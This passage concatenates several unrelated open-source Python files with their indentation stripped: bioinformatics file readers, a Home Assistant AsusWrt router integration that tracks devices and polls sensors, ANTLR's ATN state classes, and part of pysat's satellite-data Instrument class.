reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def ref_dict_gen(self,FILEPATH=os.getcwd()):
## this function output the reference chromosome into a dict
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
row=reader.next()
ref_dict= dict()
while row[0][0]=="@":
if row[0][1:3]=="SQ":
ref_name=row[1][3:]
ref_length=int(row[2][3:])
ref_dict[ref_name]=ref_length
row=reader.next()
return ref_dict
class GTF_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.CHRO_COLUMN=0
self.SOURCE_COLUMN=1
self.FEATURE_COLUMN=2
self.START_COLUMN=3
self.END_COLUMN=4
self.SCORE_COLUMN=5
self.STRAND_COLUMN=6
self.FRAME_COLUMN=7
self.ATTRIBUTE_COLUMN=8
self.SKIP_HEADER=0
class MPILEUP_SINGLE_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.CHRO_COLUMN=0
self.COOR_COLUMN=1
self.REF_COLUMN=2
self.COUNT_COLUMN=3
self.INFO_COLUMN=4
self.QUALITY_COLUMN=5
self.SKIP_HEADER=0
class GZ_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
def reader_gen(self,FILEPATH=os.getcwd()):
import gzip
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(gzip.open(complete_path),delimiter=self.SEP_CHAR)
return reader
class BLASTN6_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QUERY_ID_COLUMN=0
self.REF_ID_COLUMN=1
self.OVERLAP_PERCENTAGE_COLUMN=2
self.OVERLAP_LENGTH_COLUMN=3
self.MISMATCH_COLUMN=4
self.GAP_COLUMN=5
self.QUERY_START_COLUMN=6
self.QUERY_END_COLUMN=7
self.REF_START_COLUMN=8
self.REF_END_COLUMN=9
self.EVALUE_COLUMN=10
self.BITSCORE_COLUMN=11
self.SKIP_HEADER=0
|
|
"""Represent the AsusWrt router."""
from __future__ import annotations
from collections.abc import Callable
from datetime import datetime, timedelta
import logging
from typing import Any
from aioasuswrt.asuswrt import AsusWrt
from homeassistant.components.device_tracker.const import (
CONF_CONSIDER_HOME,
DEFAULT_CONSIDER_HOME,
DOMAIN as TRACKER_DOMAIN,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_MODE,
CONF_PASSWORD,
CONF_PORT,
CONF_PROTOCOL,
CONF_USERNAME,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
CONF_DNSMASQ,
CONF_INTERFACE,
CONF_REQUIRE_IP,
CONF_SSH_KEY,
CONF_TRACK_UNKNOWN,
DEFAULT_DNSMASQ,
DEFAULT_INTERFACE,
DEFAULT_TRACK_UNKNOWN,
DOMAIN,
PROTOCOL_TELNET,
SENSORS_BYTES,
SENSORS_CONNECTED_DEVICE,
SENSORS_LOAD_AVG,
SENSORS_RATES,
)
CONF_REQ_RELOAD = [CONF_DNSMASQ, CONF_INTERFACE, CONF_REQUIRE_IP]
KEY_COORDINATOR = "coordinator"
KEY_SENSORS = "sensors"
SCAN_INTERVAL = timedelta(seconds=30)
SENSORS_TYPE_BYTES = "sensors_bytes"
SENSORS_TYPE_COUNT = "sensors_count"
SENSORS_TYPE_LOAD_AVG = "sensors_load_avg"
SENSORS_TYPE_RATES = "sensors_rates"
_LOGGER = logging.getLogger(__name__)
def _get_dict(keys: list, values: list) -> dict[str, Any]:
"""Create a dict from a list of keys and values."""
ret_dict: dict[str, Any] = dict.fromkeys(keys)
for index, key in enumerate(ret_dict):
ret_dict[key] = values[index]
return ret_dict
class AsusWrtSensorDataHandler:
"""Data handler for AsusWrt sensor."""
def __init__(self, hass, api):
"""Initialize a AsusWrt sensor data handler."""
self._hass = hass
self._api = api
self._connected_devices = 0
async def _get_connected_devices(self):
"""Return number of connected devices."""
return {SENSORS_CONNECTED_DEVICE[0]: self._connected_devices}
async def _get_bytes(self):
"""Fetch byte information from the router."""
try:
datas = await self._api.async_get_bytes_total()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_BYTES, datas)
async def _get_rates(self):
"""Fetch rates information from the router."""
try:
rates = await self._api.async_get_current_transfer_rates()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_RATES, rates)
async def _get_load_avg(self):
"""Fetch load average information from the router."""
try:
avg = await self._api.async_get_loadavg()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_LOAD_AVG, avg)
def update_device_count(self, conn_devices: int):
"""Update connected devices attribute."""
if self._connected_devices == conn_devices:
return False
self._connected_devices = conn_devices
return True
async def get_coordinator(self, sensor_type: str, should_poll=True):
"""Get the coordinator for a specific sensor type."""
if sensor_type == SENSORS_TYPE_COUNT:
method = self._get_connected_devices
elif sensor_type == SENSORS_TYPE_BYTES:
method = self._get_bytes
elif sensor_type == SENSORS_TYPE_LOAD_AVG:
method = self._get_load_avg
elif sensor_type == SENSORS_TYPE_RATES:
method = self._get_rates
else:
raise RuntimeError(f"Invalid sensor type: {sensor_type}")
coordinator = DataUpdateCoordinator(
self._hass,
_LOGGER,
name=sensor_type,
update_method=method,
# Polling interval. Will only be polled if there are subscribers.
update_interval=SCAN_INTERVAL if should_poll else None,
)
await coordinator.async_refresh()
return coordinator
class AsusWrtDevInfo:
"""Representation of a AsusWrt device info."""
def __init__(self, mac, name=None):
"""Initialize a AsusWrt device info."""
self._mac = mac
self._name = name
self._ip_address = None
self._last_activity = None
self._connected = False
def update(self, dev_info=None, consider_home=0):
"""Update AsusWrt device info."""
utc_point_in_time = dt_util.utcnow()
if dev_info:
if not self._name:
self._name = dev_info.name or self._mac.replace(":", "_")
self._ip_address = dev_info.ip
self._last_activity = utc_point_in_time
self._connected = True
elif self._connected:
self._connected = (
utc_point_in_time - self._last_activity
).total_seconds() < consider_home
self._ip_address = None
@property
def is_connected(self):
"""Return connected status."""
return self._connected
@property
def mac(self):
"""Return device mac address."""
return self._mac
@property
def name(self):
"""Return device name."""
return self._name
@property
def ip_address(self):
"""Return device ip address."""
return self._ip_address
@property
def last_activity(self):
"""Return device last activity."""
return self._last_activity
class AsusWrtRouter:
"""Representation of a AsusWrt router."""
def __init__(self, hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Initialize a AsusWrt router."""
self.hass = hass
self._entry = entry
self._api: AsusWrt = None
self._protocol = entry.data[CONF_PROTOCOL]
self._host = entry.data[CONF_HOST]
self._model = "Asus Router"
self._sw_v: str | None = None
self._devices: dict[str, Any] = {}
self._connected_devices = 0
self._connect_error = False
self._sensors_data_handler: AsusWrtSensorDataHandler | None = None
self._sensors_coordinator: dict[str, Any] = {}
self._on_close: list[Callable] = []
self._options = {
CONF_DNSMASQ: DEFAULT_DNSMASQ,
CONF_INTERFACE: DEFAULT_INTERFACE,
CONF_REQUIRE_IP: True,
}
self._options.update(entry.options)
async def setup(self) -> None:
"""Set up a AsusWrt router."""
self._api = get_api(dict(self._entry.data), self._options)
try:
await self._api.connection.async_connect()
except OSError as exp:
raise ConfigEntryNotReady from exp
if not self._api.is_connected:
raise ConfigEntryNotReady
# System
model = await _get_nvram_info(self._api, "MODEL")
if model and "model" in model:
self._model = model["model"]
firmware = await _get_nvram_info(self._api, "FIRMWARE")
if firmware and "firmver" in firmware and "buildno" in firmware:
self._sw_v = f"{firmware['firmver']} (build {firmware['buildno']})"
# Load tracked entities from registry
entity_registry = await self.hass.helpers.entity_registry.async_get_registry()
track_entries = (
self.hass.helpers.entity_registry.async_entries_for_config_entry(
entity_registry, self._entry.entry_id
)
)
for entry in track_entries:
if entry.domain == TRACKER_DOMAIN:
self._devices[entry.unique_id] = AsusWrtDevInfo(
entry.unique_id, entry.original_name
)
# Update devices
await self.update_devices()
# Init Sensors
await self.init_sensors_coordinator()
self.async_on_close(
async_track_time_interval(self.hass, self.update_all, SCAN_INTERVAL)
)
async def update_all(self, now: datetime | None = None) -> None:
"""Update all AsusWrt platforms."""
await self.update_devices()
async def update_devices(self) -> None:
"""Update AsusWrt devices tracker."""
new_device = False
_LOGGER.debug("Checking devices for ASUS router %s", self._host)
try:
wrt_devices = await self._api.async_get_connected_devices()
except OSError as exc:
if not self._connect_error:
self._connect_error = True
_LOGGER.error(
"Error connecting to ASUS router %s for device update: %s",
self._host,
exc,
)
return
if self._connect_error:
self._connect_error = False
_LOGGER.info("Reconnected to ASUS router %s", self._host)
consider_home = self._options.get(
CONF_CONSIDER_HOME, DEFAULT_CONSIDER_HOME.total_seconds()
)
track_unknown = self._options.get(CONF_TRACK_UNKNOWN, DEFAULT_TRACK_UNKNOWN)
for device_mac, device in self._devices.items():
dev_info = wrt_devices.get(device_mac)
device.update(dev_info, consider_home)
for device_mac, dev_info in wrt_devices.items():
if device_mac in self._devices:
continue
if not track_unknown and not dev_info.name:
continue
new_device = True
device = AsusWrtDevInfo(device_mac)
device.update(dev_info)
self._devices[device_mac] = device
async_dispatcher_send(self.hass, self.signal_device_update)
if new_device:
async_dispatcher_send(self.hass, self.signal_device_new)
self._connected_devices = len(wrt_devices)
await self._update_unpolled_sensors()
async def init_sensors_coordinator(self) -> None:
"""Init AsusWrt sensors coordinators."""
if self._sensors_data_handler:
return
self._sensors_data_handler = AsusWrtSensorDataHandler(self.hass, self._api)
self._sensors_data_handler.update_device_count(self._connected_devices)
sensors_types = {
SENSORS_TYPE_BYTES: SENSORS_BYTES,
SENSORS_TYPE_COUNT: SENSORS_CONNECTED_DEVICE,
SENSORS_TYPE_LOAD_AVG: SENSORS_LOAD_AVG,
SENSORS_TYPE_RATES: SENSORS_RATES,
}
for sensor_type, sensor_names in sensors_types.items():
coordinator = await self._sensors_data_handler.get_coordinator(
sensor_type, sensor_type != SENSORS_TYPE_COUNT
)
self._sensors_coordinator[sensor_type] = {
KEY_COORDINATOR: coordinator,
KEY_SENSORS: sensor_names,
}
async def _update_unpolled_sensors(self) -> None:
"""Request refresh for AsusWrt unpolled sensors."""
if not self._sensors_data_handler:
return
if SENSORS_TYPE_COUNT in self._sensors_coordinator:
coordinator = self._sensors_coordinator[SENSORS_TYPE_COUNT][KEY_COORDINATOR]
if self._sensors_data_handler.update_device_count(self._connected_devices):
await coordinator.async_refresh()
async def close(self) -> None:
"""Close the connection."""
if self._api is not None and self._protocol == PROTOCOL_TELNET:
self._api.connection.disconnect()
self._api = None
for func in self._on_close:
func()
self._on_close.clear()
@callback
def async_on_close(self, func: CALLBACK_TYPE) -> None:
"""Add a function to call when router is closed."""
self._on_close.append(func)
def update_options(self, new_options: dict) -> bool:
"""Update router options."""
req_reload = False
for name, new_opt in new_options.items():
if name in CONF_REQ_RELOAD:
old_opt = self._options.get(name)
if not old_opt or old_opt != new_opt:
req_reload = True
break
self._options.update(new_options)
return req_reload
@property
def device_info(self) -> DeviceInfo:
"""Return the device information."""
return DeviceInfo(
identifiers={(DOMAIN, "AsusWRT")},
name=self._host,
model=self._model,
manufacturer="Asus",
sw_version=self._sw_v,
configuration_url=f"http://{self._host}",
)
@property
def signal_device_new(self) -> str:
"""Event specific per AsusWrt entry to signal new device."""
return f"{DOMAIN}-device-new"
@property
def signal_device_update(self) -> str:
"""Event specific per AsusWrt entry to signal updates in devices."""
return f"{DOMAIN}-device-update"
@property
def host(self) -> str:
"""Return router hostname."""
return self._host
@property
def devices(self) -> dict[str, Any]:
"""Return devices."""
return self._devices
@property
def sensors_coordinator(self) -> dict[str, Any]:
"""Return sensors coordinators."""
return self._sensors_coordinator
@property
def api(self) -> AsusWrt:
"""Return router API."""
return self._api
async def _get_nvram_info(api: AsusWrt, info_type: str) -> dict[str, Any]:
"""Get AsusWrt router info from nvram."""
info = {}
try:
info = await api.async_get_nvram(info_type)
except (OSError, UnicodeDecodeError) as exc:
_LOGGER.warning("Error calling method async_get_nvram(%s): %s", info_type, exc)
return info
def get_api(conf: dict, options: dict | None = None) -> AsusWrt:
"""Get the AsusWrt API."""
opt = options or {}
return AsusWrt(
conf[CONF_HOST],
conf[CONF_PORT],
conf[CONF_PROTOCOL] == PROTOCOL_TELNET,
conf[CONF_USERNAME],
conf.get(CONF_PASSWORD, ""),
conf.get(CONF_SSH_KEY, ""),
conf[CONF_MODE],
opt.get(CONF_REQUIRE_IP, True),
interface=opt.get(CONF_INTERFACE, DEFAULT_INTERFACE),
dnsmasq=opt.get(CONF_DNSMASQ, DEFAULT_DNSMASQ),
)
|
|
#
# Copyright (c) 2012-2017 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
# can be found in the LICENSE.txt file in the project root.
#
# The following images show the relation of states and
# {@link ATNState#transitions} for various grammar constructs.
#
# <ul>
#
# <li>Solid edges marked with an ε indicate a required
# {@link EpsilonTransition}.</li>
#
# <li>Dashed edges indicate locations where any transition derived from
# {@link Transition} might appear.</li>
#
# <li>Dashed nodes are place holders for either a sequence of linked
# {@link BasicState} states or the inclusion of a block representing a nested
# construct in one of the forms below.</li>
#
# <li>Nodes showing multiple outgoing alternatives with a {@code ...} support
# any number of alternatives (one or more). Nodes without the {@code ...} only
# support the exact number of alternatives shown in the diagram.</li>
#
# </ul>
#
# <h2>Basic Blocks</h2>
#
# <h3>Rule</h3>
#
# <embed src="images/Rule.svg" type="image/svg+xml"/>
#
# <h3>Block of 1 or more alternatives</h3>
#
# <embed src="images/Block.svg" type="image/svg+xml"/>
#
# <h2>Greedy Loops</h2>
#
# <h3>Greedy Closure: {@code (...)*}</h3>
#
# <embed src="images/ClosureGreedy.svg" type="image/svg+xml"/>
#
# <h3>Greedy Positive Closure: {@code (...)+}</h3>
#
# <embed src="images/PositiveClosureGreedy.svg" type="image/svg+xml"/>
#
# <h3>Greedy Optional: {@code (...)?}</h3>
#
# <embed src="images/OptionalGreedy.svg" type="image/svg+xml"/>
#
# <h2>Non-Greedy Loops</h2>
#
# <h3>Non-Greedy Closure: {@code (...)*?}</h3>
#
# <embed src="images/ClosureNonGreedy.svg" type="image/svg+xml"/>
#
# <h3>Non-Greedy Positive Closure: {@code (...)+?}</h3>
#
# <embed src="images/PositiveClosureNonGreedy.svg" type="image/svg+xml"/>
#
# <h3>Non-Greedy Optional: {@code (...)??}</h3>
#
# <embed src="images/OptionalNonGreedy.svg" type="image/svg+xml"/>
#
INITIAL_NUM_TRANSITIONS = 4
class ATNState(object):
# constants for serialization
INVALID_TYPE = 0
BASIC = 1
RULE_START = 2
BLOCK_START = 3
PLUS_BLOCK_START = 4
STAR_BLOCK_START = 5
TOKEN_START = 6
RULE_STOP = 7
BLOCK_END = 8
STAR_LOOP_BACK = 9
STAR_LOOP_ENTRY = 10
PLUS_LOOP_BACK = 11
LOOP_END = 12
serializationNames = [
"INVALID",
"BASIC",
"RULE_START",
"BLOCK_START",
"PLUS_BLOCK_START",
"STAR_BLOCK_START",
"TOKEN_START",
"RULE_STOP",
"BLOCK_END",
"STAR_LOOP_BACK",
"STAR_LOOP_ENTRY",
"PLUS_LOOP_BACK",
"LOOP_END" ]
INVALID_STATE_NUMBER = -1
def __init__(self):
# Which ATN are we in?
self.atn = None
self.stateNumber = ATNState.INVALID_STATE_NUMBER
self.stateType = None
self.ruleIndex = 0 # at runtime, we don't have Rule objects
self.epsilonOnlyTransitions = False
# Track the transitions emanating from this ATN state.
self.transitions = []
# Used to cache lookahead during parsing, not used during construction
self.nextTokenWithinRule = None
def __hash__(self):
return self.stateNumber
def __eq__(self, other):
return isinstance(other, ATNState) and self.stateNumber==other.stateNumber
def onlyHasEpsilonTransitions(self):
return self.epsilonOnlyTransitions
def isNonGreedyExitState(self):
return False
def __str__(self):
return unicode(self)
def __unicode__(self):
return unicode(self.stateNumber)
def addTransition(self, trans, index=-1):
if len(self.transitions)==0:
self.epsilonOnlyTransitions = trans.isEpsilon
elif self.epsilonOnlyTransitions != trans.isEpsilon:
self.epsilonOnlyTransitions = False
# TODO System.err.format(Locale.getDefault(), "ATN state %d has both epsilon and non-epsilon transitions.\n", stateNumber);
if index==-1:
self.transitions.append(trans)
else:
self.transitions.insert(index, trans)
class BasicState(ATNState):
def __init__(self):
super(BasicState, self).__init__()
self.stateType = self.BASIC
class DecisionState(ATNState):
def __init__(self):
super(DecisionState, self).__init__()
self.decision = -1
self.nonGreedy = False
# The start of a regular {@code (...)} block.
class BlockStartState(DecisionState):
def __init__(self):
super(BlockStartState, self).__init__()
self.endState = None
class BasicBlockStartState(BlockStartState):
def __init__(self):
super(BasicBlockStartState, self).__init__()
self.stateType = self.BLOCK_START
# Terminal node of a simple {@code (a|b|c)} block.
class BlockEndState(ATNState):
def __init__(self):
super(BlockEndState, self).__init__()
self.stateType = self.BLOCK_END
self.startState = None
# The last node in the ATN for a rule, unless that rule is the start symbol.
# In that case, there is one transition to EOF. Later, we might encode
# references to all calls to this rule to compute FOLLOW sets for
# error handling.
#
class RuleStopState(ATNState):
def __init__(self):
super(RuleStopState, self).__init__()
self.stateType = self.RULE_STOP
class RuleStartState(ATNState):
def __init__(self):
super(RuleStartState, self).__init__()
self.stateType = self.RULE_START
self.stopState = None
self.isPrecedenceRule = False
# Decision state for {@code A+} and {@code (A|B)+}. It has two transitions:
# one to the loop back to start of the block and one to exit.
#
class PlusLoopbackState(DecisionState):
def __init__(self):
super(PlusLoopbackState, self).__init__()
self.stateType = self.PLUS_LOOP_BACK
# Start of {@code (A|B|...)+} loop. Technically a decision state, but
# we don't use for code generation; somebody might need it, so I'm defining
# it for completeness. In reality, the {@link PlusLoopbackState} node is the
# real decision-making note for {@code A+}.
#
class PlusBlockStartState(BlockStartState):
def __init__(self):
super(PlusBlockStartState, self).__init__()
self.stateType = self.PLUS_BLOCK_START
self.loopBackState = None
# The block that begins a closure loop.
class StarBlockStartState(BlockStartState):
def __init__(self):
super(StarBlockStartState, self).__init__()
self.stateType = self.STAR_BLOCK_START
class StarLoopbackState(ATNState):
def __init__(self):
super(StarLoopbackState, self).__init__()
self.stateType = self.STAR_LOOP_BACK
class StarLoopEntryState(DecisionState):
def __init__(self):
super(StarLoopEntryState, self).__init__()
self.stateType = self.STAR_LOOP_ENTRY
self.loopBackState = None
# Indicates whether this state can benefit from a precedence DFA during SLL decision making.
self.isPrecedenceDecision = None
# Mark the end of a * or + loop.
class LoopEndState(ATNState):
def __init__(self):
super(LoopEndState, self).__init__()
self.stateType = self.LOOP_END
self.loopBackState = None
# The Tokens rule start state linking to each lexer rule start state */
class TokensStartState(DecisionState):
def __init__(self):
super(TokensStartState, self).__init__()
self.stateType = self.TOKEN_START
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import string
import os
import copy
import sys
import pandas as pds
import numpy as np
from . import _custom
from . import _files
from . import _orbits
from . import _meta
from . import utils
from pysat import data_dir
from pysat import DataFrame, Series
# main class for users
class Instrument(object):
"""Download, load, manage, modify and analyze science data.
Parameters
----------
platform : string
name of platform/satellite.
name : string
name of instrument.
tag : string, optional
identifies particular subset of instrument data.
sat_id : string, optional
identity within constellation
clean_level : {'clean','dusty','dirty','none'}, optional
level of data quality
pad : pandas.DateOffset, or dictionary, optional
Length of time to pad the begining and end of loaded data for
time-series processing. Extra data is removed after applying all
custom functions. Dictionary, if supplied, is simply passed to
pandas DateOffset.
orbit_info : dict
Orbit information, {'index':index, 'kind':kind, 'period':period}.
See pysat.Orbits for more information.
inst_module : module, optional
Provide instrument module directly.
Takes precedence over platform/name.
update_files : boolean, optional
If True, immediately query filesystem for instrument files and store.
temporary_file_list : boolean, optional
If true, the list of Instrument files will not be written to disk.
Prevents a race condition when running multiple pysat processes.
multi_file_day : boolean, optional
Set to True if Instrument data files for a day are spread across
multiple files and data for day n could be found in a file
with a timestamp of day n-1 or n+1.
manual_org : bool
if True, then pysat will look directly in pysat data directory
for data files and will not use default /platform/name/tag
directory_format : str
directory naming structure in string format. Variables such as
platform, name, and tag will be filled in as needed using python
string formatting. The default directory structure would be
expressed as '{platform}/{name}/{tag}'
file_format : str or NoneType
File naming structure in string format. Variables such as year,
month, and sat_id will be filled in as needed using python string
formatting. The default file format structure is supplied in the
instrument list_files routine.
Attributes
----------
data : pandas.DataFrame
loaded science data
date : pandas.datetime
date for loaded data
yr : int
year for loaded data
bounds : (datetime/filename/None, datetime/filename/None)
bounds for loading data, supply array_like for a season with gaps
doy : int
day of year for loaded data
files : pysat.Files
interface to instrument files
meta : pysat.Meta
interface to instrument metadata, similar to netCDF 1.6
orbits : pysat.Orbits
interface to extracting data orbit-by-orbit
custom : pysat.Custom
interface to instrument nano-kernel
kwargs : dictionary
keyword arguments passed to instrument loading routine
Note
----
Pysat attempts to load the module platform_name.py located in
the pysat/instruments directory. This module provides the underlying
functionality to download, load, and clean instrument data.
Alternatively, the module may be supplied directly
using keyword inst_module.
Examples
--------
::
# 1-second mag field data
vefi = pysat.Instrument(platform='cnofs',
name='vefi',
tag='dc_b',
clean_level='clean')
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,2)
vefi.download(start, stop)
vefi.load(date=start)
print(vefi['dB_mer'])
print(vefi.meta['db_mer'])
# 1-second thermal plasma parameters
ivm = pysat.Instrument(platform='cnofs',
name='ivm',
tag='',
clean_level='clean')
ivm.download(start,stop)
ivm.load(2009,1)
print(ivm['ionVelmeridional'])
# Ionosphere profiles from GPS occultation
cosmic = pysat.Instrument('cosmic2013',
'gps',
'ionprf',
altitude_bin=3)
# bins profile using 3 km step
cosmic.download(start, stop, user=user, password=password)
cosmic.load(date=start)
"""
def __init__(self, platform=None, name=None, tag=None, sat_id=None,
clean_level='clean', update_files=None, pad=None,
orbit_info=None, inst_module=None, multi_file_day=None,
manual_org=None, directory_format=None, file_format=None,
temporary_file_list=False,
*arg, **kwargs):
if inst_module is None:
# use strings to look up module name
if isinstance(platform, str) and isinstance(name, str):
self.platform = platform.lower()
self.name = name.lower()
# look to module for instrument functions and defaults
self._assign_funcs(by_name=True)
elif (platform is None) and (name is None):
# creating "empty" Instrument object with this path
self.name = ''
self.platform = ''
self._assign_funcs()
else:
raise ValueError('Inputs platform and name must both be strings, or both None.')
else:
# user has provided a module
try:
# platform and name are expected to be part of module
self.name = inst_module.name.lower()
self.platform = inst_module.platform.lower()
except AttributeError:
raise AttributeError(string.join(('A name and platform attribute for the ',
'instrument is required if supplying routine module directly.')))
# look to module for instrument functions and defaults
self._assign_funcs(inst_module=inst_module)
# more reasonable defaults for optional parameters
self.tag = tag.lower() if tag is not None else ''
self.sat_id = sat_id.lower() if sat_id is not None else ''
self.clean_level = (clean_level.lower() if clean_level is not None
else 'none')
# assign_func sets some instrument defaults, direct info rules all
if directory_format is not None:
self.directory_format = directory_format.lower()
# value not provided by user, check if there is a value provided by
# instrument module
elif self.directory_format is not None:
try:
# check if it is a function
self.directory_format = self.directory_format(tag, sat_id)
except TypeError:
pass
if file_format is not None:
self.file_format = file_format
# check to make sure value is reasonable
if self.file_format is not None:
# check if it is an iterable string. If it isn't formatted
# properly, raise Error
if (not isinstance(self.file_format, str) or
(self.file_format.find("{") < 0) or
(self.file_format.find("}") < 0)):
estr = 'file format set to default, supplied string must be '
estr = '{:s}iteratable [{:}]'.format(estr, self.file_format)
raise ValueError(estr)
# set up empty data and metadata
self.data = DataFrame(None)
self.meta = _meta.Meta()
# function processing class, processes data on load
self.custom = _custom.Custom()
# create arrays to store data around loaded day
# enables padding across day breaks with minimal loads
self._next_data = DataFrame(None)
self._next_data_track = []
self._prev_data = DataFrame(None)
self._prev_data_track = []
self._curr_data = DataFrame(None)
# multi file day, default set by assign_funcs
if multi_file_day is not None:
self.multi_file_day = multi_file_day
# arguments for padding
if isinstance(pad, pds.DateOffset):
self.pad = pad
elif isinstance(pad, dict):
self.pad = pds.DateOffset(**pad)
elif pad is None:
self.pad = None
else:
estr = 'pad must be a dictionary or a pandas.DateOffset instance.'
raise ValueError(estr)
# instantiate Files class
manual_org = False if manual_org is None else manual_org
temporary_file_list = not temporary_file_list
self.files = _files.Files(self, manual_org=manual_org,
directory_format=self.directory_format,
update_files=update_files,
file_format=self.file_format,
write_to_disk=temporary_file_list)
# set bounds for iteration
# self.bounds requires the Files class
# setting (None,None) loads default bounds
self.bounds = (None, None)
self.date = None
self._fid = None
self.yr = None
self.doy = None
self._load_by_date = False
# initialize orbit support
if orbit_info is None:
if self.orbit_info is None:
# if default info not provided, set None as default
orbit_info = {'index': None, 'kind': None, 'period': None}
else:
# default provided by instrument module
orbit_info = self.orbit_info
self.orbits = _orbits.Orbits(self, **orbit_info)
# store kwargs, passed to load routine
self.kwargs = kwargs
# run instrument init function, a basic pass function is used
# if user doesn't supply the init function
self._init_rtn(self)
# store base attributes, used in particular by Meta class
self._base_attr = dir(self)
def __getitem__(self, key):
"""
Convenience notation for accessing data; inst['name'] is inst.data.name
Examples
--------
::
# By name
inst['name']
# By position
inst[row_index, 'name']
# Slicing by row
inst[row1:row2, 'name']
# By Date
inst[datetime, 'name']
# Slicing by date, inclusive
inst[datetime1:datetime2, 'name']
# Slicing by name and row/date
inst[datetime1:datetime1, 'name1':'name2']
"""
if isinstance(key, tuple):
# support slicing
return self.data.ix[key[0], key[1]]
else:
return self.data[key]
def __setitem__(self, key, new):
"""Convenience method for adding data to instrument.
Examples
--------
::
# Simple Assignment, default metadata assigned
# 'long_name' = 'name'
# 'units' = ''
inst['name'] = newData
# Assignment with Metadata
inst['name'] = {'data':new_data,
'long_name':long_name,
'units':units}
Note
----
If no metadata provided and if metadata for 'name' not already stored
then default meta information is also added,
long_name = 'name', and units = ''.
"""
if isinstance(new, dict):
# metadata should be included in dict
self.data[key] = new.pop('data')
# pass the rest to meta
self.meta[key] = new
else:
if isinstance(key, tuple):
self.data.ix[key[0], key[1]] = new
self.meta[key[1]] = {}
elif isinstance(key, str):
self.data[key] = new
self.meta[key] = {}
elif isinstance(new, DataFrame):
self.data[key] = new[key]
for ke in key:
self.meta[ke] = {}
else:
raise ValueError("No support for supplied input key")
@property
def empty(self):
"""Boolean flag reflecting lack of data.
True if there is no Instrument data."""
return self.data.empty
def copy(self):
"""Deep copy of the entire Instrument object."""
return copy.deepcopy(self)
def _pass_func(*args, **kwargs):
pass
def _assign_funcs(self, by_name=False, inst_module=None):
"""Assign all external science instrument methods to Instrument object."""
import importlib
# set defaults
self._list_rtn = self._pass_func
self._load_rtn = self._pass_func
self._default_rtn = self._pass_func
self._clean_rtn = self._pass_func
self._init_rtn = self._pass_func
self._download_rtn = self._pass_func
# default params
self.directory_format = None
self.file_format = None
self.multi_file_day = False
self.orbit_info = None
if by_name:
# look for code with filename name, any errors passed up
inst = importlib.import_module(''.join(('.', self.platform, '_',
self.name)), package='pysat.instruments')
elif inst_module is not None:
# user supplied an object with relevant instrument routines
inst = inst_module
else:
# no module or name info, default pass functions assigned
return
try:
self._load_rtn = inst.load
self._list_rtn = inst.list_files
self._download_rtn = inst.download
except AttributeError:
estr = 'A load, file_list, and download routine are required for '
raise AttributeError('{:s}every instrument.'.format(estr))
try:
self._default_rtn = inst.default
except AttributeError:
pass
try:
self._init_rtn = inst.init
except AttributeError:
pass
try:
self._clean_rtn = inst.clean
except AttributeError:
pass
# look for instrument default parameters
try:
self.directory_format = inst.directory_format
except AttributeError:
pass
try:
self.multi_file_day = inst.self.multi_file_day
except AttributeError:
pass
try:
self.orbit_info = inst.orbit_info
except AttributeError:
pass
return
def __repr__(self):
output_str = '\npysat Instrument object\n'
output_str += '-----------------------\n'
output_str += 'Platform: '+self.platform+'\n'
output_str += 'Name: '+self.name+'\n'
output_str += 'Tag: '+self.tag+'\n'
output_str += 'Satellite id: '+self.sat_id+'\n'
output_str += '\nData Processing\n'
output_str += '---------------\n'
output_str += 'Cleaning Level: ' + self.clean_level + '\n'
output_str += 'Data Padding: ' + self.pad.__repr__() + '\n'
output_str += 'Keyword Arguments Passed to load(): ' + self.kwargs.__repr__() +'\n'
output_str += 'Custom Functions : \n'
if len(self.custom._functions) > 0:
for func in self.custom._functions:
output_str += ' ' + func.__repr__()
else:
output_str += ' ' + 'No functions applied.\n'
output_str += '\nOrbit Settings' + '\n'
output_str += '--------------' + '\n'
if self.orbit_info is None:
output_str += 'Orbit properties not set.\n'
else:
output_str += 'Orbit Kind: ' + self.orbit_info['kind'] + '\n'
output_str += 'Orbit Index: ' + self.orbit_info['index'] + '\n'
output_str += 'Orbit Period: ' + self.orbit_info['period'].__str__() + '\n'
output_str += 'Number of Orbits: {:d}'.format(self.orbits.num) + '\n'
output_str += 'Loaded Orbit Number: {:d}'.format(self.orbits.current) + '\n'
output_str += '\nLocal File Statistics' + '\n'
output_str += '---------------------' + '\n'
output_str += 'Number of files: ' + str(len(self.files.files)) + '\n'
output_str += 'Date Range: '+self.files.files.index[0].strftime('%m/%d/%Y')
output_str += ' --- ' + self.files.files.index[-1].strftime('%m/%d/%Y') + '\n'
output_str += '\nLoaded Data Statistics'+'\n'
output_str += '----------------------'+'\n'
if not self.empty:
# if self._fid is not None:
# output_str += 'Filename: ' +
output_str += 'Date: ' + self.date.strftime('%m/%d/%Y') + '\n'
output_str += 'DOY: {:03d}'.format(self.doy) + '\n'
